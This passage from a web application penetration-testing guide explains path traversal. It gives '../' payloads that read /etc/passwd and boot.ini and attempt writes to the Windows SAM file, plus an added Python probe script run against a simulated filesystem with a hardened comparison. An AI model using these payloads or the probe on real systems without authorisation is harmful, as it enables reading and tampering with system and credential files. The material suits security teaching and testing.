If the application function you are attacking provides read access to a
file, attempt to access a known world-readable file on the operating system
in question. Submit one of the following values as the filename
parameter you control:
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../boot.ini
If you are lucky, your browser will display the contents of the file you have
requested, as in Figure 10-1.
■ If the function you are attacking provides write access to a file, it may be
more difficult to verify conclusively whether the application is vulnerable.
One test that is often effective is to attempt to write two files: one that
ought to be writable by any user, and one that should not be writable
even by root or Administrator. For example, on Windows platforms you
can try:
../../../../../../../../../../../../writetest.txt
../../../../../../../../../../../../windows/system32/config/sam
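The two checks above (a read probe that looks for the signature of a known world-readable file, and a write probe that compares the outcome for a writable file against a file the operating system keeps locked) can be scripted. The following Python is an added example and is not code from the book; the `fetch` and `write` callables stand in for whatever HTTP request you would send with the filename parameter, and the in-memory filesystem, `vulnerable_read`, `vulnerable_write` and `safe_read` are constructed stand-ins for the target, included only so the logic runs offline.

```python
"""Path traversal probes: read check and two-file write check (added example)."""
import posixpath
import re
from typing import Callable, Optional

# A long run of "../" is deliberate: once the root is reached the extra
# components are discarded by the OS, so over-shooting costs nothing.
TRAVERSAL = "../" * 12

# Known world-readable files and a regex that identifies their content.
READ_TARGETS = {
    "unix":    ("etc/passwd", re.compile(r"^root:[^:]*:0:0:", re.M)),
    "windows": ("boot.ini",   re.compile(r"\[boot loader\]", re.I)),
}


def read_probe(fetch: Callable[[str], str]) -> Optional[str]:
    """Submit each traversal payload through fetch(filename) and return the
    platform whose file signature appears in the response, else None.
    Matching on content, not on HTTP 200, avoids false positives from
    applications that answer every request with a page and status 200."""
    for platform, (target, signature) in READ_TARGETS.items():
        body = fetch(TRAVERSAL + target)
        if signature.search(body):
            return platform
    return None


def write_probe(write: Callable[[str, str], bool]) -> str:
    """Two-file write test for Windows. writetest.txt at the drive root may be
    created by any user; the SAM hive is held open by the OS and cannot be
    overwritten even by Administrator. Only 'first succeeds, second fails'
    shows the supplied path really reached the filesystem."""
    ok_writable = write(TRAVERSAL + "writetest.txt", "traversal write test")
    ok_locked = write(TRAVERSAL + "windows/system32/config/sam", "traversal write test")
    if ok_writable and not ok_locked:
        return "vulnerable"       # outcomes differ exactly as the filesystem would
    if ok_writable and ok_locked:
        return "inconclusive"     # "success" for everything: the path is probably ignored
    return "not vulnerable"       # nothing could be written at all


# --- Constructed stand-in for the target (not a real server) -----------------
# Drive/filesystem root is modelled as "/"; contents are made up for the demo.
FAKE_UNIX_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    "/var/www/files/report.txt": "quarterly report",
}
FAKE_WIN_LOCKED = {"/windows/system32/config/sam"}   # held open by the OS
FAKE_WIN_WRITTEN: dict = {}


def vulnerable_read(filename: str) -> str:
    """Joins user input onto the document root with no containment check:
    the flaw the read probe is looking for."""
    path = posixpath.normpath(posixpath.join("/var/www/files", filename))
    return FAKE_UNIX_FS.get(path, "404 not found")


def vulnerable_write(filename: str, data: str) -> bool:
    """Same flaw on the write side; a locked file makes the write fail."""
    path = posixpath.normpath(posixpath.join("/inetpub/wwwroot/uploads", filename))
    if path in FAKE_WIN_LOCKED:
        return False
    FAKE_WIN_WRITTEN[path] = data
    return True


def safe_read(filename: str) -> str:
    """Hardened form: canonicalise, then refuse anything outside the root."""
    root = "/var/www/files"
    path = posixpath.normpath(posixpath.join(root, filename))
    if not path.startswith(root + "/"):
        return "403 forbidden"
    return FAKE_UNIX_FS.get(path, "404 not found")


if __name__ == "__main__":
    print("read probe  (vulnerable):", read_probe(vulnerable_read))
    print("read probe  (hardened):  ", read_probe(safe_read))
    print("write probe (vulnerable):", write_probe(vulnerable_write))
```

Against a real target, replace `fetch` and `write` with functions that send the request and return the response body (or, for writes, whether the application reported success); the value of the write test lies in the two results differing, since an application that says "OK" to both is most likely not using the path you supplied at all.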